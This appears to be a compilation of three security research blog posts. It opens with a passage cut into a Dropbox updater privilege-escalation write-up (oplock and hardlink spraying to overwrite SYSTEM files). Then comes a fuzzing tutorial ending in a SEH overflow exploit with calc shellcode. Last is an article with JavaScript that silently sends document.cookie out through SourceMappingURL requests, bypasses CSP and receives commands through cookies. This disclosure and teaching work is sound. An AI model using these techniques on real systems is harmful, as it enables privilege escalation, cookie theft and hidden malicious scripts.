Seems challenging!

After some testing we found this solution:

  • Be sure that no process “DropBoxUpdate.exe” is running (as standard user:
    c:\>tasklist | find /I “dropboxupdate”)
  • Intercept the DropBoxUdate.exe process upon startup by setting an opportunistic
    exclusive lock on the following DLL:
    • C:\Program Files(x86)\Dropbox\Update\\goopdate.dll
  • The process will hang and the user defined callback function will be triggered
  • Find the PID of the dropboxupdate process
  • Perform an “hardlink spraying” by creating 999 links with the naming convention
    mentioned before, starting from the current time (hhmmss) + 10 seconds (timeA).
  • All these links are pointing to destination file we want to own. It is possible to set at
    maximum of 1024 hardlinks to a file.
  • Wait until current time (hhmmss) is equal to timeA
  • Release the oplock
  • If everything works fine, we should match the correct file name in the range of 999 milliseconds.

Will it work? We have just to try it out, with the classic license.rtf  located in System32 folder. For testing purpose, you can directly invoke the scheduled task with admin rights instead of waiting the next hourly run.


Wow! It worked. Now you could overwrite any file where SYSTEM has full control.. and gain the highest privileges!

But let’s go a step further… would it be possible to rely only on Dropbox Client software to gain a SYSTEM shell?

Yes, of course! Remember the second scheduled task?


The task runs with SYSTEM privileges and is also triggered at the logon of any user. During our test we noticed that during the logon,  the DropboxCrashHandler.exe was also invoked (only if no other dropboxupdate process is running in other sessions):


So what was our idea? Set DropboxCrashHandler.exe  as target file, launch the exploit, overwrite the file with our “malicious” executable, logoff, logon again and our executable should be triggered!

Here you can watch the working POC. I presume that there are other possible escalation paths, it’s left up to you 


  • Dropbox has to be installed in “standard” way, with admin rights
  • We tested it with the latest Windows Dropbox Client release (87.4.138 at the time of writing)


We informed Dropbox about this issue on September, 18th. They answered that they were aware about the issue (but not with these techniques and complete escalation paths) and would fix it before the end of October. Since 90 days have passed before initial submission, I published the post.


Waiting for the new (hopefully  patched) release, meantime you could remove the “Create files” / write data” and the “Create folders /append data” permissions for “Users” on the  Log folder and you should be fine 


Generic hardlink “abuse” will no more work in future releases of Windows. In the latest “Insider” previews, MS has added some supplementary checks, so if you don’t have write access to the destination file you get an access denied error when you try to create a hardlink.

From 0 to 0day — quick fuzzing lesson

Original text by code16

In most time the question(s) you’re asking me via blog or twitter is: «how to prepare a fuzzing lab» or «how to perform an analysis of the crash we found». I decided to spent last few days for preparing a small example for you to give you the answer(s) for both of the questions. Below you will find the details. Here we go…
We will start here:

As you can see I started the fuzzer against the application called Free Photo Viewer. As far as I remember I found it here. But first things first…


Depends on what you would like to do (/»fuzz») 😉

In case of webapps or web servers — sometimes I’m using Burp Suite [12]. But for cases similar to the one we have here (FreePhotoViewer) I will recommend you to install:
— clean Windows 7 (I used 32bit)
— Immunity Debugger
— from Corelan Repository
— HxD (but you can use any hex editor you like)
— target app (in our case — FreePhotoViewer)
— FOE2 — «Failure Observation Engine».

Installation of FOE2 should be easy but remember to read the funky manual anyway! 😉

For example: you will find the place to edit in the source code to get some more detailed results:

As you can see (red frame — cdb_command): here you can put your favourite (Windbg) commands.
I like to add there also: u eip-1; u eip; kb and other similar commands. 😉

I assume that your VM LAB is prepared and FreePhotoViewer is installed. So it’s time to prepare a config for the FOE2 fuzzer.


Installed (target) app is located in «C:\Program Files\Free Photo Viewer»:

We will need it soon.  Foe2 default installation directory is c:\FOE2\. There you will find config, seeds and results:

Let’s copy default config file (foe.yaml) to 01-freephotoviewer.yaml. Next open it and edit like it is presented on the screens below:

As you can see we are changing the name of our ‘fuzzing campaign’. Next (red frame) is to place a full path to the target we want to fuzz. 3rd red frame — I just deleted NUL because we will not use any other argument.

Next thing to check in the config — location of our files. In default FOE will store all files (seeds, results) in C:\FOE2\ directory. Edit the location (path) of your ‘sample’ (seed) file(s):

Next thing nice to check in the config is called ‘Fuzzer options’. We will not discuss it today (to keep it simple;)) but you should definitely try to play the options available:

So config file is ready. Now it’s time to prepare a sample file. 🙂

In c:\foe2\seedfiles\example\ you will find a lot of files to try with FOE2. I like to get 2 or 3 (or 8 ;)) and change it a little bit in HxD. In most cases — for example I will take BMP file — I will:
— leave one original BMP file
— take a copy of it and add (for example a lot of) AAAAAA…AAAA in the end of the file
— copy original file but only header (few first lines in HxD) and then I’m adding «a lot of A’s» 😉

In this case from 1 sample seed file I will have a 3 files:

Example file (roughly;)) changed:

Save the seedfile(s and your config) and run FOE2 in cmd.exe, like this:


In usual it should take no longer than few hours to find ‘first crash’. But for example for Outlook[12] or Access[3] it took 2 months on my small laptop to finally crash the application. 😉

Anyway… after let’s say «3 days»… «you found it! There is a crash!» ;] Cool but what to do next?

Of course «depends on the crash». 😉 But for most Windows cases (read: as far as I saw so far) it will be: malformed heap, SEH overflow or Unicode (SEH) overflow. Let’s try to identify «the one» from our target app:

As you can see there are ‘few’ bugs to check… I believe you will have some fun. 😉

Now let’s open our target app in ImmunityDbg. As an argument we will use the path to the poc-file generated by FOE2. We should be somewhere here:

As we can see SEH is malformed, so probably we will have to exploit SEH overflow bug. Cool. 🙂

I used HxD to open the poc file to (hopefully) see if there will be our value from SEH chain:

Great! Next step: change nSEH, right?

So far, so good. 😉 Next I used to get POP, POP, RET:

Next I restarted the target app and after initial run (F7) I added a breakpoint on the location found with «!mona seh» (ppr), for example:

(After the jump to ppr value asm will change, so don’t worry ;))

This was a time when the ‘tricky part’ started. I was sure it is ‘easy overflow’ and I need to change the ‘poc file’ simply by adding more AAAA letters… Well, nope. ;] If I added new letters — file structure was changed. 😐

So the only way was to create a ‘valid shellcode’ with 39 characters. 🙂

First of all I tried to use some MsgBox shellcodes I found online but almost all of them were ‘bigger than 39characters’, so I failed again.

Next day 😉 I realized that one time during some private talk mzer0 and @M4tisec already told me what can I do to exploit bug(s) like this one.

TL;DR: We will create a small shellcode ;] to:
— put calc.exe in memory
— run it using WinExec

Simple enough? «We gotta try«:

I played a little bit more with the target app to see what shoud I do to manipulate the flow:

As you can see below, the file is not so long so there is a small space to put our shellcode:

I changed 43434343 to poppopret. Next we can see that we can jump to our NOP’s and CCCC-shellcode:

So after a while (and a lot of reading and searching online) I created this nasty shellcode ;P

In 2nd and 3rd PUSH you will find «.exe» and «calc» (see ESP below), next is WinExec function.

Final results you will find on the screen below:

That’s all 😉

I hope now it will be easier to find some new bugs. In case of any questions — feel free to mail me or ping me @twitter. 😉

If you like the post and you would like to donate (or just buy me a coffee;)) — on the top (right) you will find a Paypal button.

See you next time! 😉


Javascript Anti Debugging — Some Next Level Sh*t (Part 1 — Abusing SourceMappingURL)

Original text by Gal Weizman

tl;dr — Abusing SourceMappingURL feature can allow attackers to create one of the strongest Cross Browsers Javascript Anti Debugging techniques that was ever seen (fully detailed live demo)

This was originally published on PerimeterX blog

This article’s purpose is to introduce a new Javascript Anti Debugging technique in an advanced level and therefore assumes the reader already has an understanding of the different aspects of web security and what Javascript Anti Debugging really is.

Not too long ago, I learned about SourceMappingURL feature, which basically allows you to fetch a Source Map for your Javascript resources. It will map minified/uglified Javascript code to its original source code, thus will allow developers to easily debug their source code in the browser, instead of struggling with debugging the minified/uglified one — pretty cool feature! (and pretty old as well)

All you need to do is to locate the following comment at the bottom of your minified/uglified Javascript resource:

// SourceMappingURL=

and the browser will fetch the map from your servers (which you’ll also need to implement yourself in order for the feature to actually work), and will make sure to do the mapping and the representation of it for you (if this doesn’t make a lot of sense to you — go read more about SourceMappingURL!).

Two very important notes before we start:

SourceMappingURL feature is only activated when the devtools of the browser are open, since this is a development only feature and should not be a burden for the website while loading if the website is not being inspected!

Everything I am going to talk about here, is relevant to every major browser out there (was tested on Chrome, Safari, Firefox, Edge, Opera), However some might work in weaker forms. Please take into consideration that this feature did not exhibit 100% consistent behavior across browsers and versions, as achieving that was not a goal as part of this project — proof of concept was.

I was curious about its implementation and was wondering regarding its potential security issues, so I decided to have a look at it myself.

It had immediately drawn my attention when I realized its first interesting property:

If a script contains the 

 comment and is attached to the DOM, the browser will fire a request to the link specified after the 
 sign — but you won’t be able to tell that by looking at the devtools — you won’t see anything in the network panel nor the console panel — simply nowhere! The only way of telling that request had happened is by either using some sort of a network debugging proxy (such as fiddler or wireshark) or looking for that request in 
 in Chrome browser for example. The response to this request however cannot be captured by client side Javascript since it is being handled by the browser itself (because the browser is the one to get the source map and use it to map the bundled resources to the original resources).

Now that caught my attention! Being able to fire a hidden request from the browser! now that’s powerful. This is where I wondered about other properties this request might have that might be abused by attackers.

So firing a hidden request is awesome and everything, but it is just a static request. I mean, if I could dynamically construct the url to which the SourceMappingURL request should go, that would be even more powerful.

The following works:

function smap(url, data) { const script = document.createElement(‘script’); script.textContent = `// SourceMappingURL=${url}?data=${JSON.stringify(data)}`; document.head.appendChild(script); script.remove(); // that’s right! the script doesn’t even have to stay in DOM for this feature to work! how cool is that?! } smap(‘’, {cookie: document.cookie});

And since this works, I can leak any type of dynamic information I want from the browser at its current execution. I can steal cookies, report timestamp and generally collect any type of information I wish to report and simply add it to the SourceMappingURL in order to send it. This is some powerful stuff!

So far so good. But as I always do when I learn of a new trick to send requests from the browser — I tried to see if I can use this one to bypass CSP rules.

Wow! That one was a cool discovery in my research! So if I go on for example and it responds with Content-Security-Policy: default-src as one of its headers (which means requests under are only allowed to be made to, I would be able to bypass that rule completely by using the SourceMappingURL feature by doing:

// SourceMappingURL=

This is pretty cool considering how difficult and almost impossible it is to bypass CSP rules these days.

Another cool property of SourceMappingURL feature is the fact that it can send non-secure requests via 

 even if the main page was loaded via a secure connection over 
, a narrative that cannot be accomplished otherwise in the browser, since SSL downgrade is forbidden and is considered to be a serious security flaw.

So by this point I found some really cool hacks that by combining them all together, one can leak sensitive information while bypassing website’s CSP rules without it being documented whatsoever in the devtools, thus making it super hard to tell this strange activity took place in the victim’s browser.

So far so good. And then I was wondering to myself, if SourceMappingURL fires a request, does it have any of the other standard properties that any common request has? We already know that the response cannot be processed by the client side Javascript — so how is it similar to other types of network APIs in the browser? And then I’ve found the property that changed the game completely:

And that is the most powerful property of this feature — even though we don’t get to process the response ourselves, the browser respects response headers for this request, including 

! This means an attacker can have a full request-and-response mechanism, simply by having their server inject the response in the cookie header instead of the actual response!

function smap ( … ) { … } // same as in the snippent above.. const i = setInterval( () => { const response = getCookieValueByCookieName(‘SMAP_RESPONSES’); if (!response) return; deleteCookieByCookieName(‘SMAP_RESPONSES’); clearInterval(i); alert(‘server says that 1 + 2 is ‘ + response); }, 100 ); smap(‘’, {a: 1, b: 2});

Wait, This sounds much more powerful than simply just a Javascript Anti Debugging Technique — why stop there?

So, as I said before, the SourceMappingURL request is only fired when:

And that takes a lot of this finding’s power since it means that everything I have found so far is only relevant when the devtools are open.


Since SourceMappingURL feature

  • fires a request the second devtools are being opened
  • is completely silent about sending the request
  • bypasses CSP rules completely
  • respects headers and cookies

It can actually be used as a very strong Javascript Anti Debugging technique!

How? (in a couple of words…)

By using SourceMappingURL feature’s power, an attacker can make sure their code will inform their servers the second the browser has its devtools opened.

In the response, the attacker can mark that browser with a cookie that will identify that browser as a potential hazard for the hacker. With that mark, the attacker can choose to do whatever, probably to serve that browser with an innocent Javascript code instead of their malicious code until the marking cookie is expired.

Or instead, the attacker can respond with a cookie that will contain data that the malicious Javascript code relies on in order to determine its next steps (a variation of a C&C Client-Server mechanism if you will).

The server for example can respond with 

Set-Cookie: SMAP_COMMAND=while(1){}
 and the client side can execute any command given to it by the server.

Also, on top of that request, the attacker can also leak any type of information they wish to steal from the victim.

And on top of everything, it will be extremely hard for any researcher to find this malicious activity since the request leaves no trace of its occurrence (and even harder if the attacker actually decides to avoid malicious code execution on that specific browser once it was marked as a “devtools opener”).

“I don’t quite understand… I need some live examples”

That’s fair! This concept is not super easy to grasp just by reading, it is definitely worth seeing it works on live. Lucky for you, I’ve created a thorough technical demo that attempts to fully explain and demonstrate everything mentioned here.

You are encouraged to check it out and let me know what you think of it!

“Wait, you said this was Part 1, Is there a Part 2?”

Oh, right! In the next article I will cover another interesting ability I’ve found that only exists in browsers that use Chromium’s devtools.

It is another cool trick that can assist hackers in better understanding the researchers actions when trying to uncover them, and also protect only very specific parts of their malicious code, thus making it even harder for researchers to catch them.

I will post the link here once it is done 🙂

To sum up

As someone who has experienced the world of web security and hacking quite a lot in my military service, I can tell you that this trick right here will take the game to the next level if used correctly.

Revealing malicious activity in the browser is much harder for researchers when there are actions made by the attacker that take place in the browser without the researcher being able to tell that they even happened!

Correctly implementing this trick into an attacking exploit kit will significantly reduce the chances of being uncovered by researchers (maybe not so much though, now that this article is publicly published) by basically filtering those out of the way and only attacking the innocents.

This trick can of course be very helpful not only to attackers but to other entities as well (such as big companies who want to alter their code when it is being investigated by researchers for example).

This technique has been responsibly disclosed to the chromium project more than 90 days before publishing this article.

Hope you guys enjoyed this! 🙂

This research was conducted and published by Gal Weizman on behalf of PerimeterX Inc.